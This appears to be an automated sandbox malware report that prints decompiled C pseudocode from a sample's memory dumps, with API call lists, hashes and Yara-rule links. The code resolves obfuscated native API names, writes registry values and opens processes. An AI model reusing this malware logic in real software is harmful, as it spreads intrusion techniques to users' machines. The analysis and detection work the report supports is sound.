					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00FAA07B(_t54);
					} else {
						_t30 =  *0xfad230; // 0x2a9a5a8
						_t5 = _t30 + 0xfae774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xfad230; // 0x2a9a5a8
							_t7 = _t33 + 0xfae797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xfad230; // 0x2a9a5a8
								_t9 = _t36 + 0xfae756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xfad230; // 0x2a9a5a8
									_t11 = _t39 + 0xfae7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00FA6EF1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00fa4859
0x00fa485d
0x00fa491f
0x00fa4863
0x00fa4863
0x00fa4868
0x00fa487b
0x00fa487d
0x00fa4882
0x00fa488a
0x00fa4891
0x00fa4895
0x00fa4898
0x00fa4917
0x00fa4918
0x00fa489a
0x00fa489a
0x00fa489f
0x00fa48a7
0x00fa48ab
0x00fa48ae
0x00000000
0x00fa48b0
0x00fa48b0
0x00fa48b5
0x00fa48bd
0x00fa48c1
0x00fa48c4
0x00000000
0x00fa48c6
0x00fa48c6
0x00fa48cb
0x00fa48d3
0x00fa48d7
0x00fa48da
0x00000000
0x00fa48dc
0x00fa48dc
0x00fa48e1
0x00fa48e9
0x00fa48ed
0x00fa48f0
0x00000000
0x00fa48f2
0x00fa48f8
0x00fa48fd
0x00fa4904
0x00fa490b
0x00fa490e
0x00000000
0x00fa4910
0x00fa4913
0x00fa4913
0x00fa490e
0x00fa48f0
0x00fa48da
0x00fa48c4
0x00fa48ae
0x00fa4898
0x00fa492d

APIs

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FAA418,?,?,?,?,00000000,00000000), ref: 00FA486F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FA4891
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FA48A7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FA48BD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FA48D3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FA48E9

Part of subcall function 00FA6EF1: memset.NTDLL ref: 00FA6F70

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: fd56923caa6b6c01029f10c73dca3150c8ac76b03e0567cf0394c7c70b4f3650
Instruction ID: 12f5676c0300dc6bdb23eec37d8976df4b77bf9b5afd5a4e72df335359692380
Opcode Fuzzy Hash: fd56923caa6b6c01029f10c73dca3150c8ac76b03e0567cf0394c7c70b4f3650
Instruction Fuzzy Hash: EB2139F150020AAFDB50DF68CD44E6B7BECEF4A354B0045A5E846C7611E774EA04EB70

Uniqueness

Uniqueness Score: -1.00%

Function 00FA8760, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00FA8760(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0xfad2ec);
					_t96 = 0x80000002;
					L6:
					_t60 = E00FA8DEA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E00FA9E7B(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E00FAA07B(_a8);
						goto L29;
					}
					_t65 =  *0xfad230; // 0x2a9a5a8
					_t16 = _t65 + 0xfae908; // 0x65696c43
					_t68 = E00FA8DEA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d00fac0
						if(E00FA79EF( *_t33, _t96, _a8,  *0xfad2e4,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xfad230; // 0x2a9a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0xfaea0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xfae927; // 0x55434b48
								_t73 = _t34;
							}
							if(E00FA6470( &_a24, _t73,  *0xfad2e4,  *0xfad2e8,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0xfad230; // 0x2a9a5a8
									_t44 = _t75 + 0xfae893; // 0x74666f53
									_t78 = E00FA8DEA(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d00fac0
										E00FA63AB( *_t47, _t96, _a8,  *0xfad2e8, _a24);
										_t49 = _t105 + 0x10; // 0x3d00fac0
										E00FA63AB( *_t49, _t96, _t103,  *0xfad2e0, _a16);
										E00FAA07B(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d00fac0
									E00FA63AB( *_t40, _t96, _a8,  *0xfad2e8, _a24);
									_t43 = _t105 + 0x10; // 0x3d00fac0
									E00FA63AB( *_t43, _t96, _a8,  *0xfad2e0, _a16);
								}
								if( *_t105 != 0) {
									E00FAA07B(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d00fac0
					if(E00FA7A7D( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d00fac0
							E00FA79EF( *_t26, _t96, _a8, _a24, _t104);
						}
						E00FAA07B(_t104);
						_t102 = _a16;
					}
					E00FAA07B(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0xfad2ec);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x00fa8760
0x00fa8769
0x00fa8770
0x00fa8775
0x00fa87e4
0x00fa87ea
0x00fa87ef
0x00fa87f8
0x00fa87ff
0x00fa8802
0x00fa8976
0x00fa897d
0x00fa897d
0x00fa8982
0x00fa8984
0x00fa8984
0x00fa898d
0x00fa898d
0x00fa8808
0x00fa8814
0x00fa896c
0x00fa896f
0x00000000
0x00fa896f
0x00fa881a
0x00fa881f
0x00fa8828
0x00fa882f
0x00fa8832
0x00fa887c
0x00fa887c
0x00fa888f
0x00fa8899
0x00fa88a1
0x00fa88a6
0x00fa88b0
0x00fa88b0
0x00fa88a8
0x00fa88a8
0x00fa88a8
0x00fa88a8
0x00fa88d2
0x00fa88da
0x00fa8908
0x00fa890d
0x00fa8916
0x00fa891b
0x00fa891f
0x00fa8951
0x00fa8921
0x00fa892e
0x00fa8931
0x00fa8941
0x00fa8944
0x00fa894a
0x00fa894a
0x00fa88dc
0x00fa88e9
0x00fa88ec
0x00fa88fe
0x00fa8901
0x00fa8901
0x00fa895b
0x00fa8967
0x00fa895d
0x00fa8960
0x00fa8960
0x00fa895b
0x00fa88d2
0x00000000
0x00fa8899
0x00fa8841
0x00fa884b
0x00fa884d
0x00fa8852
0x00fa8856
0x00fa8858
0x00fa8863
0x00fa8866
0x00fa8866
0x00fa886c
0x00fa8871
0x00fa8871
0x00fa8877
0x00000000
0x00fa8877
0x00fa877a
0x00000000
0x00fa87a1
0x00fa87ac
0x00fa87c2
0x00fa87c8
0x00fa87d0
0x00000000
0x00fa87d0

APIs

StrChrA.SHLWAPI(00FA262A,0000005F,00000000,00000000,00000104), ref: 00FA8793
memcpy.NTDLL(?,00FA262A,?), ref: 00FA87AC
lstrcpy.KERNEL32(?), ref: 00FA87C2

Part of subcall function 00FA8DEA: lstrlen.KERNEL32(?,00FAD2E0,73BB7FC0,00000000,00FA3FBD,?,?,?,?,?,00FA9865,?), ref: 00FA8DF3
Part of subcall function 00FA8DEA: mbstowcs.NTDLL ref: 00FA8E1A
Part of subcall function 00FA8DEA: memset.NTDLL ref: 00FA8E2C

Part of subcall function 00FA63AB: lstrlenW.KERNEL32(00FA262A,?,?,00FA8936,3D00FAC0,80000002,00FA262A,00FA2829,74666F53,4D4C4B48,00FA2829,?,3D00FAC0,80000002,00FA262A,?), ref: 00FA63CB

Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087

lstrcpy.KERNEL32(?,00000000), ref: 00FA87E4

Strings

\, xrefs: 00FA87C8

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: 651dc0efe3f4c8fcfbdeb395ad5410b745b76d517410e56cd6a200e3849a6dab
Instruction ID: 49414ecd9d5a8e22f615d58f738436ecefb41455c5246c6749ccd6071d4666d3
Opcode Fuzzy Hash: 651dc0efe3f4c8fcfbdeb395ad5410b745b76d517410e56cd6a200e3849a6dab
Instruction Fuzzy Hash: 1C516CF250020AEFDF119FA0CC45EAB7BB9EF0A790F108415F91692161DB79D926FB21

Uniqueness

Uniqueness Score: -1.00%

Function 00FA8134, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00FA8134(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00FA9574(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xfad230; // 0x2a9a5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xfae4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xfae92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xfad0e4() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00fa8134
0x00fa813b
0x00fa813f
0x00fa8144
0x00fa814b
0x00fa814e
0x00fa8158
0x00fa815d
0x00fa8169
0x00fa8170
0x00fa817a
0x00fa817a
0x00fa8172
0x00fa8172
0x00fa8172
0x00fa8172
0x00fa8180
0x00fa8183
0x00fa818b
0x00fa818e
0x00fa8191
0x00fa8194
0x00fa8199
0x00fa81a2
0x00fa81af
0x00fa81a4
0x00fa81aa
0x00fa81aa
0x00fa81b5
0x00fa81b5
0x00fa81bd

APIs

Part of subcall function 00FA9574: SysAllocString.OLEAUT32(?), ref: 00FA95D0
Part of subcall function 00FA9574: SysAllocString.OLEAUT32(0070006F), ref: 00FA95E4
Part of subcall function 00FA9574: SysAllocString.OLEAUT32(00000000), ref: 00FA95F6
Part of subcall function 00FA9574: SysFreeString.OLEAUT32(00000000), ref: 00FA965A

memset.NTDLL ref: 00FA8158
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FA8194
GetLastError.KERNEL32 ref: 00FA81A4
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FA81B5

Strings

<, xrefs: 00FA8169

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: dc01d08cb95ecbccbe1a0e355c47862d396be1576f498ec77cf70c2bfc348e64
Instruction ID: a3302d772abc4e7e82b53abc336283e7434bce552f0cbcf643e15b7c2b92065d
Opcode Fuzzy Hash: dc01d08cb95ecbccbe1a0e355c47862d396be1576f498ec77cf70c2bfc348e64
Instruction Fuzzy Hash: C511FAB1D00218ABDB10DFA9DC85BDA7BF8AB0A390F148416F905E6141DBB49505EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4FE9, Relevance: 7.6, APIs: 5, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00FA4FE9(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0xfad0fc(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0xfad1f0, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

0x00fa4ff1
0x00fa4ff6
0x00fa4ff8
0x00fa4fff
0x00fa5011
0x00fa5011
0x00fa5015
0x00fa5017
0x00fa501a
0x00fa501d
0x00fa5026
0x00fa5030
0x00fa5034
0x00fa5039
0x00fa504f
0x00fa5053
0x00fa50a4
0x00fa5055
0x00fa5055
0x00fa505d
0x00fa506c
0x00fa5071
0x00fa5081
0x00fa5087
0x00fa5092
0x00fa509c
0x00fa50a0
0x00fa50a0
0x00fa5053
0x00fa50ab
0x00fa50b2

APIs

lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00FA501D
RtlAllocateHeap.NTDLL(00000000,?), ref: 00FA5049
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00FA505D
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00FA506C
memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00FA5087

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: fa630b15b62685ae1df8d3b3bfaec33385c5dd7c7d377f1dc1140c603b05c542
Instruction ID: 77fd3b1fe089fc2ee0cf5c0296724342bc25fead0db05976e51c0046b4c04182
Opcode Fuzzy Hash: fa630b15b62685ae1df8d3b3bfaec33385c5dd7c7d377f1dc1140c603b05c542
Instruction Fuzzy Hash: 4E21AEB690060AAFCF019FA8CC88A9EBFB9EF86710F058055FD04A7215C735A915DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4CF4, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FA4CF4(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xfad224 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xfad214 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xfad210 = _t6;
				 *0xfad21c = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xfad20c = _t7;
				if(_t7 == 0) {
					 *0xfad20c =  *0xfad20c | 0xffffffff;
				}
				return 0;
			}

0x00fa4cfc
0x00fa4d04
0x00fa4d09
0x00000000
0x00fa4d56
0x00fa4d0b
0x00fa4d13
0x00fa4d53
0x00000000
0x00fa4d53
0x00fa4d15
0x00fa4d1a
0x00fa4d2c
0x00fa4d31
0x00fa4d37
0x00fa4d3f
0x00fa4d44
0x00fa4d46
0x00fa4d46
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00FA2501,?,?,00000001), ref: 00FA4CFC
GetVersion.KERNEL32(?,00000001), ref: 00FA4D0B
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00FA4D1A
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00FA4D37
GetLastError.KERNEL32(?,00000001), ref: 00FA4D56

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: ca25c51c60ad49b30fe3dc869c666dff5a66b2cd1d3127b4e06e2dd39bd1604e
Instruction ID: baf469236c3194c53ad04de6f8dfa3c806020deb5c21b9a140362a46a6ddbcf9
Opcode Fuzzy Hash: ca25c51c60ad49b30fe3dc869c666dff5a66b2cd1d3127b4e06e2dd39bd1604e
Instruction Fuzzy Hash: FBF017F1A84309DAD7109F65AD09B153BE8AB87B50F10C519F62BC65E0DBB09401FF69

Uniqueness

Uniqueness Score: -1.00%

Function 00FA736F, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00FA736F(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xfad230; // 0x2a9a5a8
					_t5 = _t102 + 0xfae038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xfac2c8);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xfad230; // 0x2a9a5a8
												_t28 = _t108 + 0xfae0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xfad230; // 0x2a9a5a8
														_t33 = _t78 + 0xfae078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00fa7374
0x00fa737d
0x00fa737e
0x00fa7382
0x00fa7388
0x00fa738e
0x00fa7397
0x00fa739d
0x00fa73a7
0x00fa73a9
0x00fa73af
0x00fa73b4
0x00fa73bf
0x00fa73c7
0x00fa73ca
0x00fa74ed
0x00fa73d0
0x00fa73d0
0x00fa73dd
0x00fa73e3
0x00fa73e9
0x00fa73ed
0x00fa73f3
0x00fa7400
0x00fa7404
0x00fa740a
0x00fa740d
0x00fa7413
0x00fa7419
0x00fa741f
0x00fa7422
0x00fa7425
0x00fa742b
0x00fa7434
0x00fa743a
0x00fa743b
0x00fa743e
0x00fa743f
0x00fa7440
0x00fa7448
0x00fa7449
0x00fa744a
0x00fa744c
0x00fa7450
0x00fa7454
0x00000000
0x00000000
0x00fa745a
0x00fa7463
0x00fa7469
0x00fa7473
0x00fa7477
0x00fa7479
0x00fa7486
0x00fa748a
0x00fa7492
0x00fa7497
0x00fa74a9
0x00fa74ab
0x00fa74b1
0x00fa74b1
0x00fa74ba
0x00fa74ba
0x00fa74bc
0x00fa74c2
0x00fa74c2
0x00fa74c5
0x00fa74cb
0x00fa74ce
0x00fa74d7
0x00000000
0x00000000
0x00000000
0x00fa74d7
0x00fa742b
0x00fa7425
0x00fa740d
0x00fa74dd
0x00fa74dd
0x00fa74e3
0x00fa74e3
0x00fa74e9
0x00fa74e9
0x00fa74f2
0x00fa74f8
0x00fa74f8
0x00fa73b4
0x00fa7501

APIs

SysAllocString.OLEAUT32(00FAC2C8), ref: 00FA73BF
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00FA74A1
SysFreeString.OLEAUT32(00000000), ref: 00FA74BA
SysFreeString.OLEAUT32(?), ref: 00FA74E9

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 82108c8f929349cbeb32a616fbb466b14a06fae4aa53fd0f2598e34c9f63f4b1
Instruction ID: 3991245469617805a0aaa2df7044d9f4e7620ddcbd704fe52aa0b5e63162616b
Opcode Fuzzy Hash: 82108c8f929349cbeb32a616fbb466b14a06fae4aa53fd0f2598e34c9f63f4b1
Instruction Fuzzy Hash: 575130B5D00619DFCB00EFA8C888DAEBBB9FF8A704B148595E915EB210D7759D01DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA674C, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00FA674C(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00FA40A2(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00FAA2E7(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00FA7010(_t101,  &_v236, _a8, _t96 - _t81);
					E00FA7010(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00FAA2E7(_t101,  &E00FAD168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00FAA2E7(_a16, _a4);
						E00FA6F99(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00FAAEF0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00FAAEEA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00FA3EEB(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
